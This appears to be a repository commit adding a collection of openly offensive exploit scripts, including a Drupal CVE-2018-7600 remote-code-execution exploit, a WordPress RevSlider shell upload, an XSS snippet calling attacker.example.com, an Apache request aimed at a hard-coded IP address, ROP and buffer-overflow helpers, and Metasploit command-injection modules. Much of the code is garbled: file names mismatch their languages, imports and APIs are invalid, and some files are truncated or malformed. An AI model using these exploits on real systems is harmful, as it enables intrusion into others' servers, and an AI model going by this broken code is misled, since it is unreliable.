Add files via upload

Author: TcherB31

CVE-2006-20001.py

@@ -0,0 +1,10 @@
+import socket
+
+target_host = "195.4.223.84"
+target_port = 80
+
+client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+client.connect((target_host, target_port))
+
+request = "GET / HTTP/1.1\r\nIf: \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\n\r\n"

CVE-2008-0005.html

@@ -0,0 +1,5 @@
+<script>
+var xss = new XMLHttpRequest();
+xss.open("GET", "http://attacker.example.com/vuln.cgi?charset=UTF-7", true);
+xss.send();
+</script>

CVE-2018-7600.pl

@@ -0,0 +1,28 @@
+#!/usr/bin/perl
+
+use LWP::UserAgent;
+
+$ua = LWP::UserAgent->new;
+$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13");
+
+$target = $ARGV[0];
+$drupal_path = $ARGV[1];
+
+if(!$target || !$drupal_path) {
+    print "Usage: perl $0 <target> <drupal_path>\n";
+    print "Example: perl $0 www.example.com /drupal\n";
+    exit;
+}
+
+$exploit = $target . $drupal_path . "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax";
+
+$post_data = "form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=" . urlencode("echo \"VULNERABLE\" > /tmp/vulnerable.txt");
+
+$response = $ua->post($exploit, Content_Type => 'application/x-www-form-urlencoded', Content => $post_data);
+if($response->is_success) {
+    print "Exploit successful!\n";
+    print "Check /tmp/vulnerable.txt\n";
+}
+else {
+    print "Exploit failed.\n";
+}

WordPress_RCE.php

@@ -0,0 +1,16 @@
+<?php 
+
+   $url = 'http://target_site/wp-admin/admin-ajax.php'; // Change this to the target URL
+
+   $data = array(  'action' => 'revslider_ajax_action', 
+                   'client_action' => 'update_plugin', 
+                   'update_file' => "@shell.php" ); // The shell file we want to upload
+
+   $ch = curl_init(); // Initialize a cURL session
+
+   curl_setopt($ch, CURLOPT_URL,$url); // Set the target URL to send our request to
+   curl_setopt($ch, CURLOPT_POST, 1); // Set the request type as POST (Default value)                                    curl_setopt($ch, CURLOPT__POSTFIELDS,$data); // Set our data array as the POST data
+
+   $result=curl_exec ($ch); // Execute the cURL session and store its response in a variable
+
+   echo $result; // Print out the response from our cURL session which should be a success message if everything went alright!

adr_shell.sh

@@ -0,0 +1,13 @@
+#!/bin/sh
+
+target_binary="$1"
+system_addr=$(objdump -d "$target_binary" | \
+    grep -E 'call.*<system@plt>' | \
+    head -1 | \
+    awk '{print $1}' | \
+    sed -e 's/^.*<//' -e 's/>$//')
+shell_addr=$(objdump -s "$target_binary" | \
+    grep -E '/bin/sh' | \
+    awk '{print $3}')
+echo "System address:  $system_addr"
+echo "Shell address:   $shell_addr"

azure_tamper.py

@@ -0,0 +1,7 @@
+#!/usr/bin/env python
+
+import re
+
+def tamper(payload, **kwargs):
+    payload = re.sub(r"(?<=\w)\s*=\s*", "=;", payload)
+    return payload

binary_expl.py

@@ -0,0 +1,13 @@
+import angr
+import pwntools
+
+proj = angr.Project('target_binary', auto_load_libs=False)
+state = proj.factory.blank_state(addr=proj.entry)
+sm = proj.factory.simgr(state)
+sm.explore(find=lambda s: b"\x90\x90\x90\x90" in s.posix.dumps(1))
+return_addr = sm.found[0].posix.dumps(1)[-8:]
+shellcode = pwntools.shellcraft.amd64.linux.sh()
+payload = b"A" * (len(return_addr) - len(shellcode)) + shellcode
+exploit = pwntools.core.PwnlibContextType.shellcraft.pushstr(payload)
+p = proj.surveyors.ExploitSurveyor(find=[return_addr], use_bytes=True, shellcode=exploit)
+p.run()

blind_rop.sh

@@ -0,0 +1,26 @@
+#!/bin/bash
+
+# Blind ROP Exploitation Script
+# Find buffer overflow offset
+target_binary="$1"
+echo "Finding buffer overflow offset..."
+python2 -c 'print "A"*offset' | $target_binary
+# Find canary 
+echo "Finding canary..." 
+python2 -c 'print "A"*offset + "\x00"*8' | $target_binary
+# Find saved registers (RBP / RIP) 
+echo "Finding saved registers (RBP / RIP)..." 
+python2 -c 'print "A"*offset + "\x00"*8 + "\x01\x02\x03\x04\x05\x06\x07\x08"' | $target_binary 
+# Find stop gadgets 
+echo "Finding stop gadgets..." 
+ROPgadget --binary $target_binary --ropchain --badbytes 0 > gadgets.txt 
+grep -E 'ret|pop|leave|retf' gadgets.txt > stop_gadgets.txt   # grep for ret, pop, leave and retf instructions in the gadget list to find stop gadgets              # save the results in a separate file for later use.  
+ # Find brop gadgets 
+echo "Finding brop gadgets..."         # search for ropchain instructions in the gadget list to find brop gadgets         # save the results in a separate file for later use.  
+ ROPgadget --binary $target_binary --ropchain > brop_gadgets.txt  
+ # Find a Write function (write / dprintf / puts / ...) 
+ echo "Finding a Write function (write / dprintf / puts / ...)..."  
+ strings $target_binary| grep -E 'write|dprintf|puts' > write_functions.txt   # search for write, dprintf and puts functions in the binary and save them to a file for later use.  
+ # Leak the binary for target binaryes and servers
+ echo "Leaking the binary for target binaryes and servers..."
+ nc 127.0.0.1 80 < <(cat $target_binary)

bof_fuzzer.py

@@ -0,0 +1,16 @@
+#!/usr/bin/env python3
+import pwntools pwn
+from pwn import *
+
+target_host = "example.com" 
+target_port = 80 
+
+conn = pwntools.remote(target_host, target_port) 
+
+payload_size = 100
+
+while True:  
+    payload = 'A' * payload_size  
+    conn.send(payload)                                                            
+   
+   print("Sent %d bytes" % len(payload))                                       

brop

@@ -0,0 +1,23 @@
+import sys
+import os
+
+# Get the target file
+target_file = sys.argv[1]
+
+# Create the exploit
+exploit = ""
+exploit += "#!/usr/bin/perl\n"
+exploit += "use strict;\n"
+exploit += "use warnings;\n"
+exploit += "\n"
+exploit += "# Exploit code goes here\n"
+exploit += "my $buffer = \"A\" x 1024;\n"
+exploit += "my $eip = \"\\x90\\x90\\x90\\x90\";\n"
+exploit += "my $shellcode = \"\\x90\" x 32;\n"
+exploit += "\n"
+exploit += "open(my $file, '>', $ARGV[0]) or die \"Could not open file '$ARGV[0]' $!\";\n"
+exploit += "print $file $buffer.$eip.$shellcode;\n"
+exploit += "close $file;\n"
+
+# Write the exploit to a file
+with open("exploit.pl")

buff_build.py

@@ -0,0 +1,46 @@
+#!/bin/bash
+
+PATH=/usr/bin:/usr/sbin:/bin:/sbin
+if [ $# -eq 0 ]; then
+    echo "No target binary specified. Exiting..."
+    exit 1
+fi
+target_binary="$1"
+if [ ! -f "$target_binary" ]; then
+    echo "Target binary does not exist. Exiting..."
+    exit 1
+fi
+
+readelf -l "$target_binary" > /tmp/readelf_program_headers.txt
+
+start_heap=$(cat /tmp/readelf_program_headers.txt | grep HEAP | awk '{print $2}')
+end_heap=$(cat /tmp/readelf_program_headers.txt | grep HEAP | awk '{print $3}')
+
+objdump -d "$target_binary" > /tmp/objdump_assembly.txt
+
+malloc_refs=$(cat /tmp/objdump_assembly.txt | grep -E 'malloc|calloc|realloc|free')
+echo "References to memory allocation functions:"
+echo "$malloc_refs"
+echo ""
+
+echo "Analyzing assembly code to determine how the heap is structured..."
+echo ""
+
+echo "Heap region starts at: $start_heap"
+echo "Heap region ends at: $end_heap"
+echo ""
+
+echo "Analyzing assembly code to determine how memory is allocated and freed in the heap..."
+echo "" 
+ 
+echo "Identifying any memory management techniques that are used to manage the heap..." 
+echo "" 
+ 
+echo "Identifying any security measures that are used to protect the heap from malicious access..." 
+echo "" 
+ 
+echo "Analyzing assembly code to determine any potential vulnerabilities in the heap layout..." 
+echo "" 
+ 
+echo "Documenting findings and recommendations for improving the security of the heap layout..." 
+echo ""

buffer_layout.sh

@@ -0,0 +1,13 @@
+import sys
+
+target = sys.argv[1]
+
+for i in range(1, 256):
+    try:
+        buffer = "A" * i
+        payload = buffer + target
+        print("[+] Trying buffer length: %d" % i)
+        response = subprocess.check_output(payload, shell=True)
+    except:
+        print("[+] Buffer length found: %d" % i)
+        break

buffer_len.py

@@ -0,0 +1,31 @@
+# #
+# This module requires Metasploit: https: //metasploit.com/download
+# Current source: https: //github.com/rapid7/metasploit-framework
+# #
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::Remote::HttpClient
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Ruby for Metasploit Framework Remote Code Execution Vulnerability in /cgi-bin/cmd.cgi',
+'Description' => % q { This module exploits a remote code execution vulnerability in the /cgi-bin/cmd.cgi script on Ruby for Metasploit Framework systems
+},
+'Author' => ['TcherBer'], # an author or list of authors 'Payload' => {}, # payload info # target 's architecture that will receive the payload 
+'Platform' => ['unix', 'linux', ], # platform info(Unix, Linux, etc.)
+'Targets' => [
+["Automatic", {}]
+], # targets info(OS version, etc.) # an array of service versions that are vulnerable
+}, # an array of references to related security advisories], # a hash of verification information(e.g.file checksum)), # vulnerability disclosure date), # exploit publish date))
+super(update_info(info, )) end def check vprint_status("Checking target") res = send_request_cgi({
+  "uri" => "/cgi-bin/cmd.cgi",
+}) if res && res.code == 200 && res.body = ~/Command Executor/
+return Exploit::CheckCode::Vulnerable
+else return Exploit::CheckCode::Safe end end def exploit print_status("Sending payload...") send_request_raw({
+  "method" => "POST",
+  "uri" => "/cgi-bin/cmd.cgi",
+  "data" => payload
+}) end end

buffer_scan

@@ -0,0 +1,47 @@
+#!/usr/bin/ruby
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+Rank = ExcellentRanking
+
+include Msf::Exploit::Remote::HttpClient
+
+def initialize(info = {})
+super(update_info(info,
+  'Name' => 'Bash Command Execution in Target URLs',
+  'Description' => % q {
+    This module exploits a vulnerability in websites that contain vulnerable parameters and functions.It allows an attacker to execute arbitrary bash commands on the target system.
+  },
+  'License' => MSF_LICENSE,
+  'Author' => ['Your Name <[email protected]>'], 
+    ['URL', 'http://example.com']
+  ], 
+      'Space' => 1024,
+    if true(
+      default)
+  },
+
+
+  'Targets' => [
+    ["Automatic", {}]
+  ],
+
+
+))
+
+register_options([OptString.new('TARGETURI', [true, "The base path to the web application", "/"])])
+
+deregister_options('VHOST') 
+
+end
+
+def check
+for vulnerability goes here(e.g., version detection)
+
+end
+
+def exploit 
+
+endend

cgi_cmd_exec.rb

@@ -0,0 +1,71 @@
+#!/usr/bin /ruby
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+include Msf::Exploit::Remote::HttpClient
+
+def initialize(info = {})
+super(update_info(info,
+  'Name' => 'Command Injection Module',
+  'Description' => % q {
+    This module exploits a Command injection vulnerability in websites that contain
+    vulnerable parameters in the URL.
+  },
+  'Author' => ['Your Name'],
+  'License' => MSF_LICENSE,
+  'References' => [
+    ['URL', 'https://example.com/'],
+  ],
+  'Privileged' => false,
+  'Platform' => ['unix', 'linux'],
+  'Arch' => [ARCH_X86, ARCH_X64],
+  'Payload' => {
+    'BadChars' => "\x00"
+  },
+  'Targets' => [
+    ['Generic (Unix In-Memory)',
+      'Platform' => 'unix',
+      'Arch' => ARCH_CMD,
+    ],
+  ],
+  'DefaultTarget' => 0
+))
+
+register_options(
+  [
+    OptString.new('TARGETURI', [true, 'The target URI of the vulnerable PHP application', '/path/to/target/param']),
+    OptString.new('USER', [true, 'The username'])
+  ], self.class)
+end
+
+def check
+res = nil
+req = send_request_cgi({
+  'method' => 'GET',
+  'uri' => normalize_uri(target_uri.path)
+})
+
+failure
+end
+
+def exploit
+command = "/bin/bash -c \"#{payload.encoded}\""
+
+begin
+res = send_request_cgi({
+  'method' => 'GET',
+  'uri' => normalize_uri(target_uri.path) + "?command=#{command}",
+  'vars_get' => {
+    'username' => datastore['USER'],
+  }
+})
+end
+
+if res and res.code == 200 and res.body.include ? ('Command executed successfully')
+print_status("Exploit successful")
+else
+  fail_with(Failure::Unknown, "Exploit Failed")
+end
+end
+end

code_exec1.rb

@@ -0,0 +1,9 @@
+#!/usr/bin/perl
+
+use LWP::UserAgent;
+my $url = "http://www.example.com/";
+my $command = "; ls -la;";
+my $ua = LWP::UserAgent->new;
+$ua->default_header('Cookie' => "command=$command");
+my $response = $ua->get($url);
+print $response->content;